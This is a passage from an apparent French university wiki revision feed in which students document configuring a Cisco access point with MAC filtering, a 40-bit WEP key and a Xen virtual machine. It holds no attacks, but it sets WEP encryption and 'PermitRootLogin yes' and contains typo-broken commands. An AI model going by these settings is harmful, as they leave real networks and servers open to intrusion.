// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&lt;br /&gt;
// on se connecte a notre MV&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage &lt;br /&gt;
apt-get purge systemd&lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22536</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22536"/>
				<updated>2015-10-28T10:18:09Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du point d’accès Cisco &amp;lt;/h5&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du Wifi sur l'eeePC &amp;lt;/h5&amp;gt;&lt;br /&gt;
&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&lt;br /&gt;
// on se connecte a notre MV&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage &lt;br /&gt;
apt-get purge systemd&lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22535</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22535"/>
				<updated>2015-10-28T10:07:06Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du point d’accès Cisco &amp;lt;/h5&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du Wifi sur l'eeePC &amp;lt;/h5&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&lt;br /&gt;
// on se connecte a notre MV&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage &lt;br /&gt;
apt-get purge systemd&lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22534</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22534"/>
				<updated>2015-10-28T10:05:21Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du point d’accès Cisco &amp;lt;/h5&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du Wifi sur l'eeePC &amp;lt;/h5&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&lt;br /&gt;
// on se connecte a notre MV&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage &lt;br /&gt;
apt-systemd&lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22532</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22532"/>
				<updated>2015-10-28T09:36:41Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du point d’accès Cisco &amp;lt;/h5&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
